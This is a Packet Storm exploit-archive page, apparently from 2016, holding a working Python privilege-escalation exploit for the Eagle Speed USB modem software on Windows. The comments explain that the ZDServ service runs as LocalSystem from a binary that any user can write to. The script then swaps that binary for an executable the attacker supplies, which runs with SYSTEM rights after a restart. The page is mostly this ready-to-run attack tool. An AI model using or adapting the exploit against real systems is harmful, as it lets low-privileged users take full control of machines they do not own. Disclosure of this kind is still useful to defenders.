Exploit the possiblities

Eagle Speed USB Modem Software Privilege Escalation

Eagle Speed USB Modem Software Privilege Escalation
Posted Nov 29, 2016
Authored by R-73eN

Eagle Speed USB modem software suffers from a privilege escalation vulnerability.

tags | exploit
MD5 | 67a4ea9e0ca59f6d85e2f3fa2dc01b16

Eagle Speed USB Modem Software Privilege Escalation

Change Mirror Download
#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
# TYPE : 110 WIN32_OWN_PROCESS (interactive)
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : ZDServ
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
# NT AUTHORITY\SYSTEM:(I)(F)
# BUILTIN\Administrators:(I)(F)
# Victim-PC\lowpriv:(I)(F)
# BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#

import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner


if(len(sys.argv) < 2):
print '\n Usage : exploit.py program.exe\n'
print 'https://infogen.al/'
else:
program = sys.argv[1]
if(not os.path.isfile(program)):
print "[-] The parameter was incorrect, use a correct filename [-]"
exit(0)
if(not os.path.isfile(path)):
print "[-] File not found , propably service doesn't exists [-]\n"
else:
print "[+] Backing up the binary [+]"
os.system(file_move)
print "[+] Copying the payload [+]"
os.system("copy " + program + " " + path)
if(filecmp.cmp(program,path)):
print "[+] Exploit successfull, wait for service to restart or reboot [+]"
else:
print "[-] Exploit failed [-]"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    15 Files
  • 15
    Dec 15th
    28 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close